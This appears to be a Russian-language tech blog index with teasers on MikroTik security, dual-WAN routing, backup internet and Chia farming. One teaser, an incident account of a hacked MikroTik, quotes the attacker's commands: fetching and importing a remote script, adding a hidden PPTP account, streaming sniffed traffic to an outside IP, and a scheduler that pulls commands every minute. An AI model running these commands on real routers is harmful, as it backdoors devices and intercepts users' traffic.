Внешний айпишник? Открыт Winbox? Стандартный порт 8291?

В логах увидел

fetch: file 'mikrotik.php' downloaded

ВЗЛОМАН!

Читать дальше

Следствия и Последствия взлома микротика

Недавно столкнулся с одним глюкующим микротиком, он стал терять пакеты и потерял управление по winbox.
Зайдя локально по мак адресу на устройство было видно то, что проц упёрт в 100%, фаервол соединений около 3000 штук, в логах только одна строчка. Порт винбокс поменяли.
Микротик с внешним айпишником и прошивкой 6.42.7
Ну ясно!

Микротик взломали!

Для начала вырубил webproxy на котором подсели сотки юзарей.
Вырубил носки.
и обратил внимание на правила в фаерволе и манглы.
О ужас! Этож открытый прокси сервер! Идёт перенаправление и перехват данных.
Во всех списках прокси листах он уже есть! ЁП!

В общем всё по порядку как это делали злодеи, ломатели микротиколв.

В терминале посмотрел последние комманды

/tool fetch url=http://47.96.89.95:8000/autosupout.rif;:delay 5;/im autosupout.rif;/file remove
[find name=autosupout.rif];:if ([:len [/ip pool find name=dodo]]=0) do={/ip pool add name=dodo range=100.64.0.1-1
00.64.254;/ppp pro add name=dodo copy-from=default-encryption local-address=100.64.0.0 remote-address=dodo;/ppp se
c add name=dodo pass=dodo profile=dodo;/in pptp-ser server set enabled=yes;/ip fi nat add chain=srcnat src-address
=100.64.0.0/16 action=masquerade}

/tool sniffer set streaming-server=37.1.207.114 streaming-enabled=yes
/tool sniffer set filter-interface=all filter-ip-protocol=tcp,udp filter-port=20,21,110,143,150
0,10000 

/system scheduler add name="CMD_OS" start-time="startup" interval="00:01:00" on-event="/tool fe
tch url=http://src-ip.com/cmd.txt mode=http dst-path=i113.rsc\r\n/import i113.rsc;:delay 6s;/file remove i113.rsc"

из последнего было ясно что запущена пачка комманд с ресурса src-ip.com/cmd.txt
код
Читать дальше

denied winbox/dude connect from

— данное сообщение в логах микротика возникает тогда, когда кто-то пытается получить доступ через WINBOX, но его ip адрес не прописан в сервисе winboxa. Т.е. этот вероятный злоумышленник или робот пытается получить доступ, а доступа нет. С одной стороны не стоит сразу паниковать и думать что Вас ломают, но если лезут значит надо принимать меры ещё на шаг раньше.

После неоднократных взломов Микротика и постоянно образующихся новых дыр в безопасности устройства решил собрать список негодяев пытающихся заломиться через winbox несмотря на то что сервис открыт только для определённых ip адресов. Все эти негодяи попадают в логи с сообщениями

denied winbox/dude connect from

Читать дальше

Для того чтобы подключить резервный канал Интернет через роутер tp-link TL-MR3220 впринципе ничего сложного не надо.

Воткнул модем и с родной прошивкой настроил резерв на модем.
Так заявляет производитель:
Функция автоматического переключения каналов 3G/4G и WAN гарантирует постоянное подключение к Интернет
Просто так это было бы скучно, воткнул и работает.
Конечно лучше всего всё сделать сложнее сложного.
Вкратце это прошивка модема и написание пары скриптов.

Но лучше ещё всё усложнить и перепаять флэш память у роутера.

Читать дальше

Жил да был обычный Микротик, никого не трогал.
Но вот приключилась у него кручинушка.
Появился во втором порту новый провайдер лютый, да с внешним айпишником.
Вот тут то всё и закрутилось.


Имеется два приходящих канала от двух провайдеров с белыми ip адресами.
Требуется пробросить порт 80 до сервера в локальной сети так чтобы он был доступен по любому из каналов.
Суть проблемы заключается в том что шлюз по умолчанию один, пакет сам по себе не пойдёт куда надо, его надо научить ходить правильно и ровно.
Долго парился и наткнулся на правильную идею маркировать всё что движется, а что не движется — двигать и маркировать!

Читать дальше

После обновления Микротика до прошивки 6.42.6 (stable) перестали срабатывать скрипты привязанные к узлам Netwatch.
Нашлось временное решение убрать галочки в разрешениях скрипта, но полностью проблему не решило, так как глобальные переменные перестали быть глобальными и переключение канала в случае отвала больше не работало как раньше.

В тырнете на сайте serveradmin.ru взял первый попавшийся скрипт переключения канала на резерв в случае падения основного.
Понравилась идея, берём и модернизируем, добавляем что-то своё и удаляем что- то ненужное.
Читать дальше

Как заявили некоторые интернет ресурсы — для приложения chia blockchain, для фарминга требуется мало ресурсов и подойдёт даже слабый компьютер, кто-то заикался даже об расберри пи.
Зачем они все выдумали эти данные? Может 2 Гб оперативки хватит для запуска программы без единого плота.

Сколько жрёт программа chia оперативной памяти для фарминга?

Имеем более 200 плотов.
Читать дальше

Так сколько при создании одного плота chia требуется места на диске?
Вот график занятого места в Гигабайтах в момент создания одного плота chia на 101 Гигабайт(32).
Временной график и как создавался плот от начала до конца.
Читать дальше

Будь проклят тот день когда был запущен CHIA!

Сцука подорожали и исчезли все нормальные жесткие диски и SSD!!!

Ну и ладно всё бы хорошо, но эта зараза в один момент многочасового создания двух плотов взяла и зависла на надписи Подключение к кошельку. Какому нахер кошельку тебе надо подключаться в момент создания плотов? Всё остановилось! Но это гуавно продолжило жрать проц!

Долбаная кривая бага это а не Chia!

И что в итоге? Нихрена она не подключилась к кошельку, а после перезарпуска ХЕР чего сохранилось!

Всё начинать заново

?

Глюки этого отвратительного CHIA
Зависает
Не подключается
не синхронизируется
Тупят создающие участки или зависают вовсе
при добавлении нового участка ничего не происходит
скриптами тоже лагает
ОТСТОЙ ПОЛНЫЙ! Хорошо что скоро закончится эта CHAI!


Развод Лохотрон. кривое и сырое chia!

sudo systemctl set-default multi-user.target